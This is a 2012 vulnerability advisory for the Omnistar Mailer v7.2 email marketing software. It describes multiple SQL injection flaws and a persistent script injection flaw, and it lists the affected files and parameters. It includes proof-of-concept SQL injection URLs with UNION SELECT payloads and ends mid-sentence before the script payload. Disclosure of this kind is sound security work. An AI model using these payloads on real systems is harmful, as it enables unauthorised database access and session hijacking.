Title: ====== Omnistar Mailer v7.2 - Multiple Web Vulnerabilities Date: ===== 2012-10-01 References: =========== http://www.vulnerability-lab.com/get_content.php?id=711 VL-ID: ===== 711 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: ============= The Omnistar Mailer software was developed because of the need that was found in the industry to easily manage email marketing campaigns without having much technical experience. After reviewing feedback from various users that had used email mailing list managers, it was determined that many of the current solutions that are on the market are cumbersome and overly complex. Most users of email marketing solutions desire a simple solution were they can easily add email list campaigns and track the success of them. There of course are many other features that add value to the products, however the main function is to send out mass emails, manage the opt-in / opt-out process. After reviewing the feedback of these users and studying the current solutions on the market, we developed what we call Omnistar Mailer. We feel our product combines simplicity with a robust set of features and functions that should meet the needs of most users. The Omnistar Mailer software is one of the flag ship solutions from Omnistar Interactive. Our entire goal when developing any of our solutions has been to make it so easy to use, that any non-technical person can successfully use the software. Everyday we strive to make more and more improvements to the software so that it becomes better and better. To make this goal a reality, we actively solicit feedback from our customers so that we stay on the pulse of their needs. It is only through this interactive dialogue that we can implement those features that make sense to our customers. It is our customers that drive our development process and make sure that our software has the most desired components and features. (Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software. Report-Timeline: ================ 2012-10-01: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Omnistar Interactive Product: Omnistar Mailer v7.2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 Email Marketing Software. The vulnerabilities allow an attacker (remote) or local low privileged user account to execute a SQL commands on the affected application dbms. The vulnerabilities are located in the responder, preview, pages, navlinks, contacts, register and index modules with the bound vulnerable id & form_id parameters. Successful exploitation of the vulnerability results in dbms & application compromise. Exploitation requires no user inter action & without privileged user account. Vulnerable Module(s): [+] /admin/responder [+] /admin/preview [+] /admin/navlinks [+] /admin/pages [+] /admin/contacts [+] /users/index [+] /users/register Vulnerable File(s): [+] /admin/responder.php [+] /admin/preview.php [+] /admin/pages.php [+] /admin/navlinks.php [+] /admin/contacts.php [+] /user/register.php [+] /users/index.php Vulnerable Parameter(s): [+] ?op=edit&id= [+] ?id= [+] ?form_id= [+] ?op=edit&nav_id= [+] ?op=edit&id=16&form_id= [+] ?op=edit&id=3&form_id= [+] ?nav_id= [+] ?profile=1&form_id= [+] ?form_id= 1.2 A persistent input validation vulnerability is detected in the Omnistar Mailer v7.2 Email Marketing Software. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Create Website Forms module with the bound vulnerable form name parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account. Vulnerable Section(s): [+] Customise Interface -> Create Website Forms Vulnerable Module(s): [+] Create Standard Registration Form -> Add form Vulnerable Parameter(s): [+] Form Name Proof of Concept: ================= 1.1 The SQL injection vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-# http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20- http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-# http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20- http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2' http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2' http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2' http://127.0.0.1:1337/mailertest/users/register.php?form_id=2' --- SQL Exception --- SQL error (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3) in ( select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward from mailer75_navlinks where nav_id='9'' ) 1.2 The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action & low privileged user account. For demonstration or reproduce ... The attacker create a form and insert in "form name" field own malicious javascript or html code. To create the form the attacker should to go to Customise Interface -> Create Website Forms -> Create Standard Registration Form -> Add form Then inject the malicious script code i.e.,